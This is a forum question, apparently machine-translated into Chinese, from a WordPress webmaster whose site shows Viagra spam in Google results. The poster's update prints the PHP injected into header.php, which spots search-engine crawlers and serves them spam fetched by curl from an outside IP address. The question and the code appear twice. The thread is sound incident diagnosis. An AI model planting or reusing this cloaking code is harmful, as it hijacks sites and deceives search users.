Wordpress 网站根据 Google 遭到黑客攻击 - 是真的吗?
Wordpress Website Hacked According to Google - Is It Really?
我是 www.cuscalgary.ca 的网站管理员。如果你在 "cus calgary" 中搜索 google,我的网站有几个 link 似乎在 link 描述中有奇怪的、看似荷兰语的字符串(见下面的截图)比如"köpa viagra snabb leverans"。另外,我在 Google.
上我网站的主要 link 下方收到了一条声名狼藉的 "This site may be hacked" 消息
到目前为止,我已尝试通过 Google Chrome 的网络浏览器和 CTRL+F 检查页面代码,以找到显示在搜索结果中的词(例如,尝试在“联系我们”页面中找到 "Paul Junker"),我尝试下载主题文件夹并通过记事本 ++ 执行 "search through folder" 函数以查找任何这些奇怪的字符串。我什至尝试通过 Wordpress 仪表板查找这些字符串中的任何一个。唉,我没有发现这些奇怪的字符串的迹象。
我开始认为 Google 可能有一段时间没有抓取我的网站了,这些字符串后来不知何故被删除了。虽然,我怀疑是不是这样。
有没有人有类似的经历并找到了解决方案?如果是这样,我将非常感谢听到您如何处理这种麻烦。
非常感谢您的帮助 - 所有的帮助我们都感激不尽。
凯尔西
更新:
我可能在 header.php 文件中找到了罪魁祸首。查看我在以下文件开头找到的代码:
<?php
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
'#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
'#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
'#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
'#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*note#i', '#FAST\s*MetaWeb\s*Crawler#i',
'#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
'#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
'#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
'#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
'#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
'#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i', '#BingBot#i' ) ;
if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
$isbot = 1;
}
if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
$isbot = 1;
}
if(@$isbot){
$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");
$result = curl_exec($ch);
curl_close ($ch);
echo $result;
}
?><!DOCTYPE html>
有可能,是的。但是如果不能访问该网站本身,仅从您列出的搜索结果很难说。
安装 Wordfence(我喜欢)之类的东西,让它扫描您的网站。它应该比较您服务器上的文件和 WP 存储库中的文件,并在有任何更改时提醒您。它甚至可能会告诉您一些其他您不知道的事情。
我是 www.cuscalgary.ca 的网站管理员。如果你在 "cus calgary" 中搜索 google,我的网站有几个 link 似乎在 link 描述中有奇怪的、看似荷兰语的字符串(见下面的截图)比如"köpa viagra snabb leverans"。另外,我在 Google.
到目前为止,我已尝试通过 Google Chrome 的网络浏览器和 CTRL+F 检查页面代码,以找到显示在搜索结果中的词(例如,尝试在“联系我们”页面中找到 "Paul Junker"),我尝试下载主题文件夹并通过记事本 ++ 执行 "search through folder" 函数以查找任何这些奇怪的字符串。我什至尝试通过 Wordpress 仪表板查找这些字符串中的任何一个。唉,我没有发现这些奇怪的字符串的迹象。
我开始认为 Google 可能有一段时间没有抓取我的网站了,这些字符串后来不知何故被删除了。虽然,我怀疑是不是这样。
有没有人有类似的经历并找到了解决方案?如果是这样,我将非常感谢听到您如何处理这种麻烦。
非常感谢您的帮助 - 所有的帮助我们都感激不尽。
凯尔西
更新:
我可能在 header.php 文件中找到了罪魁祸首。查看我在以下文件开头找到的代码:
<?php
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
'#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
'#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
'#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
'#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*note#i', '#FAST\s*MetaWeb\s*Crawler#i',
'#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
'#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
'#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
'#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
'#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
'#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i', '#BingBot#i' ) ;
if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
$isbot = 1;
}
if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
$isbot = 1;
}
if(@$isbot){
$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");
$result = curl_exec($ch);
curl_close ($ch);
echo $result;
}
?><!DOCTYPE html>
有可能,是的。但是如果不能访问该网站本身,仅从您列出的搜索结果很难说。
安装 Wordfence(我喜欢)之类的东西,让它扫描您的网站。它应该比较您服务器上的文件和 WP 存储库中的文件,并在有任何更改时提醒您。它甚至可能会告诉您一些其他您不知道的事情。